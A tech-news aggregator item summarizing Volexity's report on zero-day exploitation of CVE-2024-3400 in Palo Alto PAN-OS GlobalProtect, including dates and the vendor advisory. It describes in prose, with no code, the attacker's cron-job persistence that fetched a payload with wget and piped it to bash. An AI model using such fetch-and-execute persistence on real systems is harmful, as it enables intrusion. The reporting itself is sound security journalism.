Techly NewsGet the app

Get the latest tech news

Palo Alto Networks PAN-OS Zero-Day Exploitation


On April 10, 2024, Volexity identified zero-day exploitation of a vulnerability found within the GlobalProtect feature of Palo Alto Networks PAN-OS at one of its network security monitoring (NSM) customers. Volexity received alerts regarding suspect network traffic emanating from the customer’s firewall. A subsequent investigation determined the device had been compromised. The following day, April 11, 2024, Volexity observed further, identical exploitation at another one of its NSM customers by the same threat actor.

Palo Alto Networks has since issued an advisory for CVE-2024-3400 that includes information regarding a threat protection signature released to customers, as well as a timeline for a fix, which at the time of writing is expected April 14, 2024. Volexity used telemetry from its own network security sensors, client endpoint detection, response (EDR) software, and forensic data collected from multiple systems to paint a thorough picture of the attacker’s actions in the incidents investigated. The initial persistence mechanism setup by UTA0218 involved configuring a cron job that would use wget to retrieve a payload from an attacker-controlled URL with its output being written to stdout and piped to bash for execution.

Get the Android app

Or read this on Hacker News

Read more on:

Photo of Palo Alto

Palo Alto

Photo of pan-os zero-day

pan-os zero-day

Photo of day exploitation

day exploitation

Related news:

News photo

Unauthenticated, RCE vulnerability in Palo Alto firewalls, exploits in the wild

News photo

Palo Alto Networks Plunges by Most Ever After Cutting Outlook

News photo

Palo Alto Networks Slips After Missing Billings Estimate

« Zero-day exploited right now in Palo Alto Networks' GlobalProtect gateways
Google Threatens To Cut Off News After California Proposes Paying Media Outlets »